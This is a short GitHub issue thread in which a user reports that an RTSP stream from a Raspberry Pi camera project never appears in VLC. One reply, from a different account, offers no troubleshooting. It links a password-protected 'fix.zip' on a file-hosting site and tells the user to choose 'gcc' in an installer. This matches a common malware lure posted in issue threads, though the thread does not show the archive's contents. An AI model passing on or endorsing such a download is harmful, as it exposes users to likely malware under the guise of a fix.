### ISSUE TITLE
I tried the process steps by steps, but unfortunately it doesn't work. I need to get this working so that  I can integrate the camera with my flutter app.

### ISSUE THREAD

**Issue by abhinovpankaj** [smford/raspberry-pi-streaming-camera#1]
VLC nevershows the stream over rtsp

**Comment by abhinovpankaj** [comment]
when I try libcamera-vid command and open stream on tcp, I am able to see the stream it means camera is working just fine.

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
